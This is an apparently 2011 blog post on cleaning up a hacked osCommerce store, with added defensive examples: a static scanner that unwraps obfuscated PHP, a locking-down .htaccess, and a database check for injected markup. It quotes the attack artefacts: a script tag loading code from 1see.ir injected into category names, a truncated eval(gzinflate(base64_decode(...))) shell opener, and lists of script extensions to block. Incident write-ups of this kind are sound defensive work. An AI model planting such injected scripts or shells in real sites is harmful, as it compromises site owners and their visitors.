script src=http://1see.ir/j/
Long time no write – but here’s another exploit – maybe two.
My client’s hosting company contacted him regarding spam mail being sent from his account. After downloading his site I found a couple of exploits that had been popped in there:
In the catalog/images folder there were three extra files, *.php, *.phtml and *.ind – each of those contained the same code, terminating in a PHP mail() function. If accessed they give you a ‘console’ window (see images at foot of post) from which you can rename, delete, upload and change file permissions.
Opening this on my localhost allowed me several minutes of fun as I scampered around the hard drive right into the root folder – not sure how far you’d really get on a live, web-facing server – on the one I Googled up the console was limited to just the images folder – but there are quite a few sites that seem to have this file out there.
OK – so that’s all very well, what about the mail() function? Find a web facing server that has the files on it and you’ll get a login screen – I guess Mr Hacker logs in, uploads a file plus a list of email addresses and spamsalot.
As if that’s not enough, in the catalog/images folder there were also a lot of ‘hidden’ files starting with a full stop:
A quick look inside reveals our old friend – (base64_decode())
<? eval(gzinflate(base64_decode('
7Rxrd9rG8rN7Tv/DWpdTQ0uwANuJH7jBxA/s2I7B......
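The rogue files described above (the *.php, *.phtml and *.ind drops that give the console, and the dotfiles wrapped in eval(gzinflate(base64_decode(...)))) can be found and unwrapped without ever running them. The script below is an added example, not code from the post or from osCommerce: it builds a throwaway folder of constructed files standing in for the real ones, lists everything that should not live in an images folder, and statically peels the obfuscation layers. IMAGE_EXTS, ALLOWED_HIDDEN and the regex are this example's own assumptions; the mail() line in the sample is a harmless placeholder, not the real shell.

```python
import base64
import os
import re
import tempfile
import zlib

# Extensions that legitimately belong in catalog/images (assumption for this example)
IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png"}
# The one hidden file that is allowed once the folder has been locked down
ALLOWED_HIDDEN = {".htaccess"}

# One eval(gzinflate(base64_decode('...'))) layer. gzinflate( is optional because
# some droppers use plain eval(base64_decode(...)). Group 2 is the base64 blob.
LAYER_RE = re.compile(
    r"eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]*)['\"]",
    re.IGNORECASE,
)


def unwrap(source, max_layers=20):
    """Peel nested eval(gzinflate(base64_decode(...))) layers WITHOUT executing any PHP.

    Returns (innermost source, number of layers removed). max_layers stops a
    payload that keeps re-wrapping itself from looping forever.
    """
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(source)
        if not m:
            break
        blob = base64.b64decode(re.sub(r"\s+", "", m.group(2)))
        if m.group(1):
            # PHP's gzinflate() is raw DEFLATE (no zlib/gzip header), hence wbits=-15
            blob = zlib.decompress(blob, -15)
        source = blob.decode("utf-8", errors="replace")
        layers += 1
    return source, layers


def scan(folder):
    """Map relative path -> reason for every file that should not be in an images folder."""
    findings = {}
    for root, _dirs, names in os.walk(folder):
        for name in names:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, folder)
            ext = os.path.splitext(name)[1].lower()
            reasons = []
            if name.startswith(".") and name not in ALLOWED_HIDDEN:
                reasons.append("hidden file")
            elif ext not in IMAGE_EXTS and name not in ALLOWED_HIDDEN:
                reasons.append("non-image extension %r" % ext)
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")  # lossless for any byte, never raises
            if LAYER_RE.search(text):
                inner, n = unwrap(text)
                reasons.append("%d obfuscation layer(s); inner code starts %r" % (n, inner[:40]))
            elif "<?" in text and ext in IMAGE_EXTS:
                reasons.append("PHP opener inside an image file")  # crude polyglot check
            if reasons:
                findings[rel] = "; ".join(reasons)
    return findings


def wrap(php):
    """Build one <? eval(gzinflate(base64_decode('...'))); ?> layer, raw DEFLATE like PHP's gzdeflate()."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = c.compress(php.encode()) + c.flush()
    return "<? eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(blob).decode()


def make_sample_folder():
    """Constructed stand-in for the compromised catalog/images folder (not real samples)."""
    folder = tempfile.mkdtemp(prefix="images_")
    # Harmless placeholder for the mailer/console code; the real shell is not reproduced
    inner = "<?php /* constructed sample */ mail($_POST['to'], $_POST['s'], $_POST['b']); ?>"
    files = {
        "logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
        "mailer.phtml": inner.encode(),
        "x.ind": inner.encode(),
        ".cache.php": wrap(wrap(inner)).encode(),  # two layers, like the dotfiles in the post
        ".htaccess": b"php_flag engine off\n",
    }
    for name, data in files.items():
        with open(os.path.join(folder, name), "wb") as fh:
            fh.write(data)
    return folder


if __name__ == "__main__":
    for rel, why in sorted(scan(make_sample_folder()).items()):
        print(rel, "->", why)
```

Point scan() at the real catalog/images to get the same listing for a live site. The unwrapped source is only decoded and printed, so it is safe to read the mailer or console code this way before deleting it.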
No idea what they were up to – rather than decode the lot I just binned them, then popped an .htaccess file into the images folder to stop scripts running from within the folder.
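An .htaccess that does the job described above, as an added config fragment rather than the post's own file. It switches the PHP interpreter off for the folder, strips any handler mapped to script extensions (including the .ind extension seen here) and refuses to serve dotfiles at all; the extension list is an assumption to be extended for the server in question.

```apache
# catalog/images/.htaccess  (added example, not the file from the post)

# Stop mod_php interpreting anything in this folder, whatever the extension.
# Needs AllowOverride Options (or All) for the directory; has no effect under
# php-fpm/FastCGI, where the same rules belong in a <Directory> block in the vhost.
<IfModule mod_php5.c>
    php_flag engine off
</IfModule>
<IfModule mod_php7.c>
    php_flag engine off
</IfModule>
<IfModule mod_php.c>
    php_flag engine off
</IfModule>

# Drop any handler or MIME type the server may have mapped to script extensions here.
RemoveHandler .php .phtml .php3 .php4 .php5 .phar .inc .cgi .pl
RemoveType .php .phtml .php3 .php4 .php5

# Belt and braces: refuse to serve script-looking files and dotfiles outright.
# Apache 2.2 syntax; on 2.4 without mod_access_compat use "Require all denied".
<FilesMatch "(?i)\.(php\d?|phtml|phar|inc|ind|cgi|pl|py|sh)$">
    Order allow,deny
    Deny from all
</FilesMatch>
<FilesMatch "^\.">
    Order allow,deny
    Deny from all
</FilesMatch>
```

The caveat is that the console found here can upload, rename and chmod files, so whoever planted it can simply overwrite this .htaccess. The file only holds once the shells are gone and the folder is no longer writable by the web server user; moving the rules into the vhost with AllowOverride None removes that dependency entirely.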
Great, so that’s us cured? What about the title of the post? What’s the script src=http://1see.ir/j/ all about then? The left-hand menu on the /catalog/ pages had an attempt at injecting a script in there – the HTML looked like this (lots of nested tables – yaaay!):
<table cellpadding="0" cellspacing="0" border="0" class="bg1">
  <tr>
    <td class="bg2">
      <table cellpadding="0" cellspacing="0" border="0" class="bg3">
        <tr>
          <td class="set"><a href=http://www.adomain.com/script-srchttp1seeirj-c-92.html><script src=http://1see.ir/j/> </a></td>
        </tr>
      </table>
    </td>
  </tr>
</table><br style="line-height:1px">
<table cellpadding="0" cellspacing="0" border="0" class="bg1">
  <tr>
    <td class="bg2">
      <table cellpadding="0" cellspacing="0" border="0" class="bg3">
        <tr>
          <td class="set"><a href=http://www.adomain.com/script-c-93.html></script> </a></td>
        </tr>
      </table>
OK – so what’s with the JavaScript and how does it get there? The database has been hacked with an attempt to pop a JavaScript in there instead of a category name – a glance in the database shows that the categories_name field in the categories table for one category had the <script src=http://1see.ir/j/> bit and the next category had the </script>.
Snippety snip, deleted and correct category names added.
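Finding every row like that, and seeing why the two half-tags still run once the menu is rendered, as an added example (Python over an in-memory SQLite copy; not the post's own code or osCommerce's). The table and column names follow the post (categories.categories_name); in a stock osCommerce 2.2 schema the name column sits in categories_description, so adjust PLAIN_TEXT_COLUMNS for the real database. The rows are constructed to mimic categories 92 and 93 from the HTML above, plus a legitimate ampersand and an entity-encoded variant to show what should and should not be flagged.

```python
import html
import sqlite3

# Columns that should hold plain text only (assumed shape; the post names categories.categories_name)
PLAIN_TEXT_COLUMNS = {
    "categories": ["categories_name"],
    "products_description": ["products_name"],
}

# The same LIKE patterns work unchanged in MySQL. A lone '<' or '>' is enough:
# the injection in the post was split over two rows, so searching one field for
# a complete <script>...</script> would miss both halves.
LIKE_PATTERNS = ["%<%", "%>%", "%&#%", "%&lt;%"]


def find_injected(conn):
    """Return [(table, column, row id, value)] for every plain-text field carrying markup."""
    hits = []
    for table, cols in PLAIN_TEXT_COLUMNS.items():
        for col in cols:
            where = " OR ".join("%s LIKE ?" % col for _ in LIKE_PATTERNS)
            # identifiers come from the constant map above, never from user input
            sql = "SELECT rowid, %s FROM %s WHERE %s" % (col, table, where)
            for rowid, value in conn.execute(sql, LIKE_PATTERNS):
                hits.append((table, col, rowid, value))
    return hits


def render_menu(names, escape):
    """Mimic a category menu that prints names straight into HTML (escape=False)
    or through htmlspecialchars-style escaping (escape=True)."""
    cells = []
    for name in names:
        safe = html.escape(name, quote=True) if escape else name
        cells.append('<td class="set"><a href="#">%s</a></td>' % safe)
    return "\n".join(cells)


def make_sample_db():
    """Constructed rows imitating the post: the tag split across categories 92 and 93."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (categories_id INTEGER PRIMARY KEY, categories_name TEXT)")
    conn.execute("CREATE TABLE products_description (products_id INTEGER PRIMARY KEY, products_name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", [
        (92, "<script src=http://1see.ir/j/>"),
        (93, "</script>"),
        (94, "Hardware"),
        (95, "Tom & Jerry DVDs"),  # a legitimate ampersand must not be flagged
    ])
    conn.executemany("INSERT INTO products_description VALUES (?, ?)", [
        (1, "Widget"),
        (2, "Widget &#60;img src=x onerror=alert(1)&#62;"),  # entity-encoded angle brackets
    ])
    return conn


if __name__ == "__main__":
    db = make_sample_db()
    for hit in find_injected(db):
        print("injected:", hit)
    halves = [v for t, _c, _r, v in find_injected(db) if t == "categories"]
    print(render_menu(halves, escape=False))  # browser sees a real <script> element
    print(render_menu(halves, escape=True))   # browser sees literal text
```

The unescaped rendering is the point of the split: neither row is a complete tag on its own, but the menu prints them back to back and the browser's parser joins them. Cleaning the rows removes this instance; escaping category and product names on output is what stops the next one.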
Not sure if the javascript is linked to the files in the images folder or not.
- Hidden files in the images folder
- Web facing mailer login
- File manipulation console
This entry was posted by Graeme on July 29, 2011 at 10:38 am, and is filed under Security, osCommerce.